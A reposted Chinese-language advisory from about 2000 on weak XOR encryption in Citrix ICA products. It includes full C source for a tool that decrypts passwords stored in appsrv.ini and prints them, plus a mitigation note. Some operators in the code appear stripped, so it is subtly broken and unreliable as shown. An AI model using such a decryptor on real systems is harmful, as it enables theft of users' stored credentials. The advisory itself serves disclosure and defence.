ICA弱加密算法
2008-04-09 04:33:41来源:互联网 阅读 ()
发布日期:2000-03-30
更新日期:2000-03-31
受影响系统:
Citrix MetaFrame for Unix 1.0描述:
- Sun Solaris 8.0
- Sun Solaris 7.0
Citrix MetaFrame for Windows 2000 1.8 and previous
- Microsoft Windows NT 2000.0
Citrix MetaFrame for Windows NT 4.0 TSE 1.8 and previous
- Microsoft Windows NT Terminal Server
Microsoft Windows NT 4.0
Citrix WinFrame for Windows NT 3.5 1.8
- Microsoft Windows NT 3.5.1
By Dug Song <dugsong@monkey.org>
ICA协议使用基于异或(XOR)的加密算法对被保存或传输的用户资料进行保护。但加密算法较弱,使得攻击者能将窃听/窃取到的数据解密。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* 本程序能够对WinFrame软件保存在appsrv.ini文件中的口令进行解密。*/
/*
icadecrypt.c
Decrypt stored Citrix ICA passwords (in appsrv.ini).
Dug Song <dugsong@monkey.org>
*/
#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
int
hex_decode(char *src, u_char *dst, int outsize)
{
char *p, *pe;
u_char *q, *qe, ch, cl;
pe = src strlen(src);
qe = dst outsize;
for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p = 2) {
ch = tolower(p[0]);
cl = tolower(p[1]);
if ((ch >= '0') && (ch <= '9')) ch -= '0';
else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
else return (-1);
if ((cl >= '0') && (cl <= '9')) cl -= '0';
else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
else return (-1);
*q = (ch << 4) | cl;
}
return (q - dst);
}
int
ica_decrypt(u_char *pass, int len)
{
u_short i;
u_char *p, key;
if (len < 4)
return (0);
i = ntohs(*(u_short *)pass);
if (i != len - 2)
return (0);
key = pass[2];
p = pass 3;
for (i -= 2; i > 0; i--)
p[i] = p[i - 1] ^ p[i] ^ key;
p[0] ^= (key | 'C');
i = len - 3;
memmove(pass, pass 3, i);
pass[i] = '\0';
return (1);
}
void
usage(void)
{
fprintf(stderr, "Usage: icadecrypt <file>\n");
exit(1);
}
int
main(int argc, char *argv[])
{
FILE *f;
u_char line[1024], pass[128];
int len;
if (argc != 2 || *argv[1] == '-')
usage();
if ((f = fopen(argv[1], "r")) == NULL) {
perror("fopen");
exit(1);
}
while (fgets(line, sizeof(line), f) != NULL) {
if (strncmp(line, "Password=", 9) == 0) {
len = hex_decode(line 9, pass, sizeof(pass));
if (ica_decrypt(pass, len))
printf("; icadecrypt: [%s]\n", pass);
}
printf("%s", line);
}
fclose(f);
exit(0);
}
/* 5000. */
建议:
临时解决方法:Citrix提供了支持Diffie-Helman和RC5加密算法的SecureISA。请到http://www.citrix.com/products/sica/中查阅更多的资料。
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash